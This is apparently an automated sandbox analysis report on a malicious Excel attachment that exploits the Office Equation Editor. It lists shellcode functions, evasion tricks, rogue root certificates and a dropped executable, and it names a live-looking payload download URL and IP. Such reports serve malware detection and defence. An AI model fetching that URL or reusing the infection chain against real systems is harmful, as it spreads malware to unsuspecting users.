Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Memory allocated: 130000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Memory allocated: 1A610000 memory reserve \| memory write watch			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: EQNEDT32.EXE	Binary or memory string: hgkQx0bZZLJUrWxFmRPXH5Fsqo11MpdW7y4iFnOnBgrEaVSPNLYW4TshKdjMsbOzRssqClqFKcptnKiVR7MlMYdNRpaXBDtWntYcVysEChfG80eo8HF1qOQDLuzIxh0PLZVooQOzuQk7FYBbaMc58z9UBRMRq5fwFR8ClBIqeMUEp2DBytrkvNiT6v5kVPmNf2rZ2EV3Z1IPUSdnSPPmqc2TItZzbhF0ks4hHeutoxaQusMkBSexYi0kstFwlzx6eUCN
Source: EQNEDT32.EXE	Binary or memory string: ypwyU1OsJGoI9gzmwpH0ELmWtubn8HTSbmYovpXdNywAoujLuu5PbVYYmIJ2HCmQ0hS2SdxpQzOJu4uqKsVD0mAHqOA5Igb5YPIgyioyr6pkLRfobVBSMTnDVxqw817yfekmOMGb54uW2KClAZoAZsbuAnydfVRdlERMcpSFWhGfszcFOr0MXEitDfEEnPlZEv3RYPXQYlaCmh7nh9R69rJg5MHiS1ELUVF56Ohhb2WAflquVDmOM1YoAelAXbzSwleI
Source: EQNEDT32.EXE	Binary or memory string: UfbNZoESc6NLHOvdpfYbWygLBie8xAB8UF5CCYC8rXcwQ89Z8UylnvcEQFCy0JozdgH8li5ItoZiIxPg8PJQpowFXP9s7YQA3UbxvMnEtUcRYsbF1yyMHiWehjtcvvvxvCSSKVFCz49uqwcYviMLocJl2iq06RCcPLFOeBKVN6ctpAOt1AtB4aBpjvPnJ8BReTMYWRyPA7OA9boXRqxdid39vrzlC3lio5EkbI4DXdsXUGmlNIzUPnq0m5ziPDqi2kGi
Source: EQNEDT32.EXE	Binary or memory string: rEBr304tHgFsyzPPcXV8dAreVTPm9lBvcw6qv32bDfylApbmd54oUsycozejFWgyisg6C6HowVMtrRgj9QXz8PqWXRJejP6ZS9S2fnnOkMwgpVgBQgT3NRVHzzwwN3Rb6vw48odHvNGYpfd2k1OO0b1lRn4zw8lzwNgaLmoMjkptgZZCQcqRlYOvB0DDFI4dFeC16ONZSaB68uWZhcKbSyeeTmv13DPSKu1lBGMmO5scyIV3tAOHsUqpcGio8VoKRIiC
Source: EQNEDT32.EXE	Binary or memory string: eL6Q7la1TPigYMZLFUoxYNz1napOC0vPdcZ8aUz4VseqEmuNqZzBcxzwIENLfha9DMtXGsdf8nUUjzCsIJPvOdrUB1j6x8JwvyrH9qnxtZ3G6rg098rpuMspxMgJ8BNwIrF1IJl7Ja5pLKfuuR7ZB1L6Af0dDn5HqQoQj9nIwGPpVIQj8dxnHXWTKKUjEpi875N8TIBdI1lwceEeL7A9Cnh50lvGCEWeeFhnZdEKtExniJNo4IXIzhA7gN4sBtp0xJY6
Source: EQNEDT32.EXE	Binary or memory string: enqSmw50XklvAzsJAlS1muLkliuLOtKMkouxDqjvFCZ0Pk1VbMs6bGmvpk6tLA7HA6MXgsGOY95Caz1Q8xZaUgFEjUONkLOzQ6zpEwzax269jb8DGxK6S62p1MaSdMQe5BaVtvAd0FPWqUf2ZkwLYOQsElQn06WQemuDgk5iEBkyzZs3XjBwoThXr5j1vUvTfHkceI2yAGw9Cj4QjLpZFF8wSlFoQQxwf6tNoWHZKskjTuUIfyfstc1HZBnpVorzAe78

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_0361079C mov edx, dword ptr fs:[00000030h]

1_2_0361079C

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\opponbvew.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
154.38.177.76	estqrow.com	United States		174	COGENT-174US	true

Contacted Domains

Name	IP	Active
estqrow.com	154.38.177.76	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://estqrow.com/rt/vss.exe	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Quotation_398893.xlam.xlsx

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe	Virustotal: Detection: 6%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Virustotal: Detection: 6%			Perma Link

Multi AV Scanner detection for submitted file

Source: Quotation_398893.xlam.xlsx	ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx	Virustotal: Detection: 50%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 154.38.177.76 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

Source:

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610775 WinExec,ExitProcess,	1_2_03610775
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,	1_2_036106C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_0361072A URLDownloadToFileW,	1_2_0361072A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610649 URLDownloadToFileW,	1_2_03610649
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_036106DB URLDownloadToFileW,	1_2_036106DB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610795 ExitProcess,	1_2_03610795
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610614 ExitProcess,	1_2_03610614

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Code function: 4x nop then dec eax

4_2_000007FE8B6F4201

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: estqrow.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443
Source: global traffic	TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: COGENT-174US COGENT-174US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW,

1_2_036106C1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe

Jump to behavior

Source: global traffic

Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: estqrow.com

Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exe
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exeC:
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exehhC:
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://estqrow.com/rt/vss.exej
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Quotation_398893.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal100.expl.winXLSX@4/4@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Quotation_398893.xlam.xlsx	ReversingLabs: Detection: 71%
Source: Quotation_398893.xlam.xlsx	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Section loaded: rpcrtremote.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Quotation_398893.xlam.xlsx

Initial sample: OLE zip file path = xl/media/image1.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Quotation_398893.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

Uses code obfuscation techniques (call, push, ret)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_0361006C push eax; ret	1_2_0361006D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 1_2_03610278 push edi; iretd	1_2_0361027C
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Code function: 4_2_000007FE8B6F00BD pushad ; iretd	4_2_000007FE8B6F00C1
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe	Code function: 4_2_000007FE8B6F00CD pushad ; iretd	4_2_000007FE8B6F00C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe			Jump to dropped file

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
